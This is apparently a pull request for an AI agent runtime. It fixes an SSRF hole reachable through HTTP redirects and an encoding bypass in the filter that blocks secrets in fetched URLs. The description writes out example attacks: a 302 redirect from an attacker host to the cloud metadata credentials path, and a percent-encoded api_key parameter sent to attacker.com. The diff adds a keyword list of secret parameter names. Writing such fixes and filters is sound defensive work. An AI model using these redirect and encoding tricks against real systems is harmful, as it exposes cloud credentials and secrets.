### PR TITLE
fix(security): close SSRF via redirect + URL-encoding bypass in taint

### DIFF
--- a/crates/librefang-runtime/src/tool_runner.rs
+++ b/crates/librefang-runtime/src/tool_runner.rs
@@ -52,24 +52,44 @@ fn check_taint_shell_exec(command: &str) -> Option<String> {
 ///
 /// Blocks URLs that appear to contain API keys, tokens, or other secrets
 /// in query parameters (potential data exfiltration). Implements TaintSink::net_fetch().
+///
+/// Both the raw URL and its percent-decoded query parameter names are
+/// checked — an attacker can otherwise bypass the filter with encoding
+/// tricks such as `api%5Fkey=secret` (the server decodes `%5F` to `_`
+/// and receives the real `api_key=secret`).
 fn check_taint_net_fetch(url: &str) -> Option<String> {
-    let exfil_patterns = [
-        "api_key=",
-        "apikey=",
-        "token=",
-        "secret=",
-        "password=",
-        "Authorization:",
-    ];
-    for pattern in &exfil_patterns {
-        if url.to_lowercase().contains(&pattern.to_lowercase()) {
-            let mut labels = HashSet::new();
-            labels.insert(TaintLabel::Secret);
-            let tainted = TaintedValue::new(url, labels, "llm_tool_call");
-            if let Err(violation) = tainted.check_sink(&TaintSink::net_fetch()) {
-                warn!(url = crate::str_utils::safe_truncate_str(url, 80), %violation, "Net fetch taint check failed");
-                return Some(violation.to_string());
+    const SECRET_KEYS: &[&str] = &["api_key", "apikey", "token", "secret", "password"];
+
+    // Scan 1: raw URL literal for `<key>=` and the Authorization header prefix.
+    let url_lower = url.to_lowercase();
+    let mut hit = url_lower.contains("authorization:");
+    if !hit {
+        hit = SECRET_KEYS
+            .iter()
+            .any(|k| url_lower.contains(&format!("{k}=")));
+    }
+
+    // Scan 2: percent-decoded query parameter names. Parsing via
+    // `url::Url` decodes each name so `api%5Fkey` becomes `api_key`.
+    if !hit {
+        if let Ok(parsed) = url::Url::parse(url) {
+            for (name, _value) in parsed.query_pairs() {
+                let name_lower = name.to_lowercase();
+                if SECRET_KEYS.iter().any(|k| name_lower == *k) {
+                    hit = true;
+                    break;
+                }
             }
+        }
+    }
+
+    if hit {
+        let mut labels = HashSet::new();
+        labels.insert(TaintLabel::Secret);
+        let tainted = TaintedValue::new(url, labels, "llm_tool_call");
+        if let Err(violation) = tainted.check_sink(&TaintSink::net_fetch()) {
+            warn!(url = crate::str_utils::safe_truncate_str(url, 80), %violation, "Net fetch taint check failed");
+            return Some(violation.to_string());
         }
     }
     None

--- a/crates/librefang-runtime/src/web_fetch.rs
+++ b/crates/librefang-runtime/src/web_fetch.rs
@@ -28,9 +28,31 @@ impl WebFetchEngine {
     ///
     /// Uses the resolved addresses from [`check_ssrf`] to configure DNS
     /// pinning on the builder, preventing DNS-rebinding TOCTOU attacks.
+    ///
+    /// Installs a custom redirect policy so every 3xx target is re-validated
+    /// through `check_ssrf`. Without this, an attacker-controlled public
+    /// host could respond with `302 Location: http://169.254.169.254/...`
+    /// and reqwest's default policy would silently follow — the DNS pin
+    /// only protects the original hostname, not redirect targets.
     fn pinned_client(&self, resolution: SsrfResolution) -> reqwest::Client {
+        let allowed_hosts = self.config.ssrf_allowed_hosts.clone();
+        let redirect_policy = reqwest::redirect::Policy::custom(move |attempt| {
+            if attempt.previous().len() >= 10 {
+                return attempt.error("too many redirects");
+            }
+            // Clone target to String so we can still move `attempt` into
+            // attempt.error() on the SSRF-denied branch below.
+            let target = attempt.url().as_str().to_owned();
+            match check_ssrf(&target, &allowed_hosts) {
+                Ok(_) => attempt.follow(),
+                Err(reason) => {
+                    attempt.error(format!("SSRF blocked redirect to {target}: {reason}"))
+                }
+            }
+        });
         let builder = crate::http_client::proxied_client_builder()
             .timeout(std::time::Duration::from_secs(self.config.timeout_secs))
+            .redirect(redirect_policy)
             .gzip(true)
             .deflate(true)
             .brotli(true);


### PR DESCRIPTION
## Problems

Two linked security holes in \`web_fetch\` / \`check_taint_net_fetch\`:

### 1. SSRF via HTTP 3xx redirect

\`check_ssrf()\` validates the original URL once and pins its DNS — but reqwest's default redirect policy follows up to 10 redirects **without re-validating each target**. The DNS pin only protects the original hostname, not redirect chain targets.

**Attack**: attacker controls a public host, serves:
\`\`\`
HTTP/1.1 302 Found
Location: http://169.254.169.254/latest/meta-data/iam/security-credentials/
\`\`\`
\`web_fetch(\"http://attacker.com/\")\` passes the initial SSRF check (public IP), gets the 302, and reqwest dutifully fetches the metadata endpoint. Cloud credential exfiltration.

### 2. \`check_taint_net_fetch\` bypass via percent-encoding

The filter did a raw \`.contains(\"api_key=\")\` check without percent-decoding. \`https://attacker.com?api%5Fkey=sk-secret\` passes (\`%5F\` ≠ \`_\`); the server decodes \`%5F\` to \`_\` server-side and receives the real secret. Classic encoding bypass.

## Fix

**Redirect validation**: install \`reqwest::redirect::Policy::custom()\` on the pinned client that runs \`check_ssrf()\` on every 3xx target with the same \`ssrf_allowed_hosts\` config. Redirects to private IPs / metadata endpoints abort the chain with an explicit SSRF error. 10-hop cap retained.

**Percent-decoded scan**: after scanning the raw URL (still catches direct \`api_key=\` and the \`Authorization:\` literal), also parse via \`url::Url\` and walk \`query_pairs()\` — the crate percent-decodes names, so \`api%5Fkey\` shows up as \`api_key\` and matches.

## Context

Found by a code-scan subagent doing a security-focused pass on taint tracking + HTTP client.

## Test plan

- [ ] \`web_fetch\` against a URL that 302s to 169.254.169.254 → redirect aborted with SSRF error
- [ ] \`web_fetch\` against a URL that 302s to a legitimate public host → still follows
- [ ] 10+ redirect chain → aborts with "too many redirects"
- [ ] \`web_fetch(\"http://x.com?api%5Fkey=sec\")\` → taint check trips
- [ ] \`web_fetch(\"http://x.com?api_key=sec\")\` → still trips (regression)
- [ ] \`web_fetch(\"http://x.com?query=hello\")\` → passes (regression)